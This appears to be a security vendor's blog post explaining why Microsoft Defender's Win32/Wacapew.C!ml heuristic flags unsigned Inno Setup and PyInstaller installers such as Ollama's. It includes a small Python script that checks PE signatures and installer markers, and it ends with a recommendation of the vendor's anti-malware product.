Win32/Wacapew.C!ml Examples

The most prominent example of a Wacapew detection is the Ollama AI model installer. Users online reckon that the reason is its similarity to Inno Setup-based installers. Inno Setup is a free installer for Windows programs that uses the eponymous script language and allows developers to fine-tune the installation process. Besides Inno installers, antivirus software also detects installation files created with PyInstaller. In this case, the trigger is the lack of a file signature.

Screenshot: Ollama installer detection

Another striking example is users’ own files, such as architectural 3D models created with Enscape. GitHub also contains reports that files downloaded from this program are detected as Win32/Wacapew.C!ml. In addition to all the above, such detections are not rare in pirated software. Since most of it is packaged with the aforementioned Inno Setup and may also have other questionable properties, Microsoft Defender starts showing the detection.

Screenshot: Users’ files detection

As you can see, any file without a proper signature, or with anything about it that resembles a questionable trait, may trigger the Wacapew detection. Nonetheless, I would not recommend ignoring the detection completely, as sometimes it can point at a genuinely dangerous app.
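A quick way to see why a flagged file trips this heuristic is to check the two things the text names: an Authenticode signature entry in the PE header, and Inno Setup or PyInstaller markers. The Python below is an added example, not Microsoft’s or Gridinsoft’s code; it reads the PE security data directory, scans for the well-known Inno Setup data header and PyInstaller archive cookie, and builds a constructed minimal PE skeleton (the verdict strings are my own wording) to exercise itself.

```python
import struct
from typing import Dict

# Markers the text associates with Wacapew: no Authenticode signature plus an
# installer/packer layout. The byte strings are the Inno Setup data header and
# the PyInstaller archive cookie as they appear inside such executables.
INNO_MARKER = b"Inno Setup Setup Data"
PYINSTALLER_COOKIE = b"MEI\x0c\x0b\x0a\x0b\x0e"

def has_authenticode(data: bytes) -> bool:
    """True if the PE's IMAGE_DIRECTORY_ENTRY_SECURITY (index 4) is populated.
    This only shows a signature is attached; validity must be checked separately."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0" or len(data) < pe + 26:
        return False
    opt = pe + 24                                           # optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    dirs = opt + (0x60 if magic == 0x10B else 0x70)         # PE32 vs PE32+
    if len(data) < dirs + 5 * 8:
        return False
    rva, size = struct.unpack_from("<II", data, dirs + 4 * 8)
    return rva != 0 and size != 0

def triage(data: bytes) -> Dict[str, object]:
    """Summarise the signals an analyst would weigh when a Wacapew alert fires."""
    signed = has_authenticode(data)
    inno = INNO_MARKER in data
    pyi = PYINSTALLER_COOKIE in data
    if signed:
        verdict = "signed: likely false positive, verify the signer"
    elif inno or pyi:
        verdict = "unsigned installer/packer: matches Wacapew trigger, check origin"
    else:
        verdict = "unsigned plain PE: low heuristic signal"
    return {"signed": signed, "inno_setup": inno, "pyinstaller": pyi, "verdict": verdict}

def make_fake_pe(signed: bool, tail: bytes = b"") -> bytes:
    """Constructed minimal PE32 skeleton (not loadable), enough for triage()."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = b"PE\0\0" + b"\0" * 20
    opt = struct.pack("<H", 0x10B) + b"\0" * (0x60 - 2)     # PE32 optional header
    dirs = bytearray(16 * 8)
    if signed:
        struct.pack_into("<II", dirs, 4 * 8, 0x1000, 0x800) # security dir entry
    return dos + coff + opt + bytes(dirs) + tail

if __name__ == "__main__":
    print(triage(make_fake_pe(False, INNO_MARKER)))
```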

How to Remove Win32/Wacapew.C!ml?

Unfortunately, some users have problems with Win32/Wacapew.C!ml removal. In some cases, Defender fails to remove the malware and keeps showing notifications for files that are no longer on the device. To make sure your device is clean, I recommend using GridinSoft Anti-Malware. It will detect and remove Wacapew and find other malware. It can also work alongside Windows Defender to create an additional line of defense.


]]>
https://gridinsoft.com/blogs/win32-wacapew-cml-detection-analysis/feed/ 0 20330